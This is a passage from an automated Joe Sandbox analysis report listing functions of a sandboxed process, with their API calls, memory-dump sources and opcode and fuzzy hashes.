                                                                                                                                                                      • API String ID: 3646017727-0
                                                                                                                                                                      • Opcode ID: 54b40b60d17954498afbda6e0be6e75fe6e588cc0dde21e5a9b72b15a5b09ebf
                                                                                                                                                                      • Instruction ID: 94ec1146b063f42eee21530e38cc285c08f3bf14af321b0c9e99e5901ad5f8f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 54b40b60d17954498afbda6e0be6e75fe6e588cc0dde21e5a9b72b15a5b09ebf
                                                                                                                                                                      • Instruction Fuzzy Hash: 5A21E672D0011E9BCF12EFD4D8818FEB7B9AF64350B14402AE921B7251EB359E45CFA0
                                                                                                                                                                      Function 0018EAD4 Relevance: 1.6, APIs: 1, Instructions: 80COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,?), ref: 0018EB65
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: LongWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1378638983-0
                                                                                                                                                                      • Opcode ID: f4f2d0d32c541e3af3d6718a308c0d75bd95a346eed3d1e97d580e36d8304156
                                                                                                                                                                      • Instruction ID: 494f3326b735ab9069db5c32ca0e69b9ee158f12d46bd8cd484fc194616b1297
                                                                                                                                                                      • Opcode Fuzzy Hash: f4f2d0d32c541e3af3d6718a308c0d75bd95a346eed3d1e97d580e36d8304156
                                                                                                                                                                      • Instruction Fuzzy Hash: 68218631500709AFCF35EF14C984AAABBF5EB48300F20491AF857936A0C331EA848F91
                                                                                                                                                                      Function 5F5225D6 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F522243: _memset.LIBCMT ref: 5F522280
                                                                                                                                                                        • Part of subcall function 5F522243: _strcat.LIBCMT ref: 5F52228A
                                                                                                                                                                        • Part of subcall function 5F522243: __wcstoi64.LIBCMT ref: 5F5222AE
                                                                                                                                                                        • Part of subcall function 5F528425: _malloc.LIBCMT ref: 5F52843F
                                                                                                                                                                      • htonl.WS2_32(?), ref: 5F522617
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __wcstoi64_malloc_memset_strcathtonl
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2862793191-0
                                                                                                                                                                      • Opcode ID: ef4d60983490f399362d8605afea76583426b3f638859e89317ea6d2a09efd01
                                                                                                                                                                      • Instruction ID: 23fa49848d0c826fd4f0013a327e90f87bc06bdc64e4eba6eac486121a952fa4
                                                                                                                                                                      • Opcode Fuzzy Hash: ef4d60983490f399362d8605afea76583426b3f638859e89317ea6d2a09efd01
                                                                                                                                                                      • Instruction Fuzzy Hash: 8F11B2B6103711BEF3649FB8E800B9B77D4AB48720F60033AEA08DB1D0DEA1A90083C5
                                                                                                                                                                      Function 5F5226DA Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                      • Opcode ID: 1e8c591ce45972c734cffb2b6b836b4c0822c0cf04ce7fa5f223d233c2a7b32b
                                                                                                                                                                      • Instruction ID: 1bb305415699e30cbcd3fd193866adf929ad03b3fdff1923f810ce8fe2d38214
                                                                                                                                                                      • Opcode Fuzzy Hash: 1e8c591ce45972c734cffb2b6b836b4c0822c0cf04ce7fa5f223d233c2a7b32b
                                                                                                                                                                      • Instruction Fuzzy Hash: 3411B47550211DABEF15CF64CC40EEF7BF9AF55200F0442EBE509A7280DE319A54CBA0
                                                                                                                                                                      Function 001AEB31 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AEB38
                                                                                                                                                                        • Part of subcall function 001E5546: _malloc.LIBCMT ref: 001E5560
                                                                                                                                                                        • Part of subcall function 001AE1E2: __EH_prolog3.LIBCMT ref: 001AE1E9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3$_malloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1683881009-0
                                                                                                                                                                      • Opcode ID: b01a5e38a8fc63f5241e42a331fb0aa8448e66826582372afdfeb5b67ba0974a
                                                                                                                                                                      • Instruction ID: a30f84cf71334b0a3d9bcc5e3f26074cfe23959e8dd1e8cba12febfe89f186b3
                                                                                                                                                                      • Opcode Fuzzy Hash: b01a5e38a8fc63f5241e42a331fb0aa8448e66826582372afdfeb5b67ba0974a
                                                                                                                                                                      • Instruction Fuzzy Hash: F121A238A01254AFDF11DFA8C5497ADBBF2AF5A704F144058FD46AB3A1CB718E40DB61
                                                                                                                                                                      Function 0016E410 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0016E080: GetCurrentProcessId.KERNEL32 ref: 0016E084
                                                                                                                                                                        • Part of subcall function 0016E080: CreateFileW.KERNEL32 ref: 0016E0AA
                                                                                                                                                                      • PathFileExistsW.SHLWAPI(?,06AC2023,?,00000000,?,?,00000000,0021D2E0,000000FF,?,0016B43F,?), ref: 0016E465
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: File$CreateCurrentExistsPathProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3040742104-0
                                                                                                                                                                      • Opcode ID: 0f54156c9c85551c2458039aeabf521958460e54485086d9d2201c81cc5511c3
                                                                                                                                                                      • Instruction ID: 7551a5f166a45e87b008bc5ae39a62f586892c2ca7610707b86606237f8b6237
                                                                                                                                                                      • Opcode Fuzzy Hash: 0f54156c9c85551c2458039aeabf521958460e54485086d9d2201c81cc5511c3
                                                                                                                                                                      • Instruction Fuzzy Hash: 9811A976605608EBDB10CF55EC05BABB7E8FB01750F04462AFC15D3681EF75A920C6A5
                                                                                                                                                                      Function 0016DA70 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 001DF9AF: EnterCriticalSection.KERNEL32(0024CD40,00000000,?,?,0016DA81,00000000,?,?,?,?,0016B6E0,?,00000000,?,?), ref: 001DF9BC
                                                                                                                                                                        • Part of subcall function 001DF9AF: LeaveCriticalSection.KERNEL32(0024CD40,0016B364,?,0016DA81,00000000,?,?,?,?,0016B6E0,?,00000000,?,?), ref: 001DF9D8
                                                                                                                                                                      • FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,0016B6E0,?,00000000,?,?), ref: 0016DAA6
                                                                                                                                                                        • Part of subcall function 0016DC40: LoadResource.KERNEL32(0016B364,0021CD88,00000000,?,0016DAB8,00000000,00000000,?,?,00000000,00000000,?,?,?,?,0016B6E0), ref: 0016DC4C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalResourceSection$EnterFindLeaveLoad
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1986744039-0
                                                                                                                                                                      • Opcode ID: 5f3502930b214d24a8c15adac48118090363e4c90971fb248cfcc75a62fde64b
                                                                                                                                                                      • Instruction ID: bd89131a316d551a015ef2d74b41383178ae524015630fb9771123835894b5a5
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f3502930b214d24a8c15adac48118090363e4c90971fb248cfcc75a62fde64b
                                                                                                                                                                      • Instruction Fuzzy Hash: F8F02867F4D22927972598A67C40E77B79ECAE07F5711013AFC42C7300DB119C2142F1
                                                                                                                                                                      Function 001AEBDA Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001AEBE1
                                                                                                                                                                        • Part of subcall function 001ADE99: __EH_prolog3.LIBCMT ref: 001ADEA0
                                                                                                                                                                        • Part of subcall function 001AEB31: __EH_prolog3.LIBCMT ref: 001AEB38
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 431132790-0
                                                                                                                                                                      • Opcode ID: 4e28c87f786db024790cbcd1ae4431f5ff8d6f9f59e7615ff4c98fe877813a44
                                                                                                                                                                      • Instruction ID: 7cfd1af9f25aa0c7a95754c0620c2cc9e14ebaf0ab088cdfdc5e12231c51af12
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e28c87f786db024790cbcd1ae4431f5ff8d6f9f59e7615ff4c98fe877813a44
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A110A39801509AFDF06EFE4ED42AEEBB76EF25314F104414F511761A2DB315E25DB50
                                                                                                                                                                      Function 001B62CA Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __EH_prolog3.LIBCMT ref: 001B62D1
                                                                                                                                                                        • Part of subcall function 00186986: _wcschr.LIBCMT ref: 001869AB
                                                                                                                                                                        • Part of subcall function 001B5F4D: __EH_prolog3_GS.LIBCMT ref: 001B5F54
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: H_prolog3H_prolog3__wcschr
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4028972141-0
                                                                                                                                                                      • Opcode ID: c453f1dcbceefd18d52db73e08a9b99dc64cbc9eafd4f5aba72cc1a488c8ff50
                                                                                                                                                                      • Instruction ID: 07b8673d06bc263fbc43440d67252ffe42b4d88c98f0f3b6008a17bc29fc7011
                                                                                                                                                                      • Opcode Fuzzy Hash: c453f1dcbceefd18d52db73e08a9b99dc64cbc9eafd4f5aba72cc1a488c8ff50
                                                                                                                                                                      • Instruction Fuzzy Hash: 72019231288B14EAE708AA60CC12FFD3291BB35756F118112F90A9A0E1DBB84E90D792
                                                                                                                                                                      Function 00184BB9 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00184BC2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2882836952-0
                                                                                                                                                                      • Opcode ID: 70a148a57471f89d6a0fbdb5149b52717c53522bbdb11fa1df4bba4d99b62540
                                                                                                                                                                      • Instruction ID: 0012f1cec55f09a3cf35194ecf77ba0e8d49926339754106ea227bf15a87b24a
                                                                                                                                                                      • Opcode Fuzzy Hash: 70a148a57471f89d6a0fbdb5149b52717c53522bbdb11fa1df4bba4d99b62540
                                                                                                                                                                      • Instruction Fuzzy Hash: 3011A571500706DFD735AB68CC45BD673E8BB18356F014929F59A87092EBB4EA88CFD0
                                                                                                                                                                      Function 5F51C780 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • PostMessageW.USER32(5F5BC3F0,000004CC,00000000,00000001), ref: 5F51C7E1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 410705778-0
                                                                                                                                                                      • Opcode ID: 4eee8d0da18b91263007244a731ab12bd501089b7c61631fe133d59376d7cc37
                                                                                                                                                                      • Instruction ID: fd30dc28ac643d0b2626704c20eb1a507572d4ac76bd7f42dd80ccf5b0bb5986
                                                                                                                                                                      • Opcode Fuzzy Hash: 4eee8d0da18b91263007244a731ab12bd501089b7c61631fe133d59376d7cc37
                                                                                                                                                                      • Instruction Fuzzy Hash: 19018CB96016019FEB08EF19C848C97BBE5EF88320B11C47EE949CB761D771E800CAA0
                                                                                                                                                                      Function 5F522675 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 5F5221AC: socket.WS2_32(00000002,00000002,00000011), ref: 5F5221C3
                                                                                                                                                                        • Part of subcall function 5F5221AC: _memset.LIBCMT ref: 5F5221DB
                                                                                                                                                                        • Part of subcall function 5F5221AC: htonl.WS2_32(00000000), ref: 5F5221F2
                                                                                                                                                                        • Part of subcall function 5F5221AC: htons.WS2_32(?), ref: 5F5221FA
                                                                                                                                                                        • Part of subcall function 5F5221AC: htonl.WS2_32(0100007F), ref: 5F522216
                                                                                                                                                                        • Part of subcall function 5F5221AC: bind.WS2_32(00000000,?,00000010), ref: 5F522222
                                                                                                                                                                      • closesocket.WS2_32(?), ref: 5F522693
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: htonl$_memsetbindclosesockethtonssocket
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 95467627-0
                                                                                                                                                                      • Opcode ID: a15ccbe16c4228ba5f6cb7f7a22e74fa58b1e6f1b0463a24e9f7d17fb5d978d1
                                                                                                                                                                      • Instruction ID: 1d406b04fadfe4aa9f18cf95db687c5894660e7d31c83e44211993fc96f1cf77
                                                                                                                                                                      • Opcode Fuzzy Hash: a15ccbe16c4228ba5f6cb7f7a22e74fa58b1e6f1b0463a24e9f7d17fb5d978d1
                                                                                                                                                                      • Instruction Fuzzy Hash: 5CF028D788F7D42AF73196704C1568B7ED4EB02264B480FBAE062DA4C2E985B6884391
                                                                                                                                                                      Function 5F521CB9 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4158634502.000000005F4D1000.00000020.00000001.01000000.00000010.sdmp, Offset: 5F4D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4158576782.000000005F4D0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F56F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158786706.000000005F575000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F57A000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4158861183.000000005F5BC000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4159004826.000000005F5BF000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5f4d0000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                                      • Opcode ID: af538cd043288dd749ce54a756f71cdef0dfbcf575e79ae3ac8efeca56c8ba03
                                                                                                                                                                      • Instruction ID: 5499b686df078b23594de08e7ae0f5ca826e00b6a1edc8cfce60fb1666c009f3
                                                                                                                                                                      • Opcode Fuzzy Hash: af538cd043288dd749ce54a756f71cdef0dfbcf575e79ae3ac8efeca56c8ba03
                                                                                                                                                                      • Instruction Fuzzy Hash: AF016D76602209ABCB00DBA48C41EEFB7F9EF94720F10452FE905E7281DB75AA1497A5
                                                                                                                                                                      Function 001EF4B2 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __lock_file.LIBCMT ref: 001EF4F9
                                                                                                                                                                        • Part of subcall function 001E98D1: __getptd_noexit.LIBCMT ref: 001E98D1
                                                                                                                                                                        • Part of subcall function 001EA5B1: __decode_pointer.LIBCMT ref: 001EA5BC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.4138235490.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                                                                                                      • Associated: 00000007.00000002.4138060161.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138770666.0000000000243000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4138919927.0000000000246000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.0000000000250000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000007.00000002.4139907799.000000000053D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_160000_inst.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __decode_pointer__getptd_noexit__lock_file
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3158947991-0
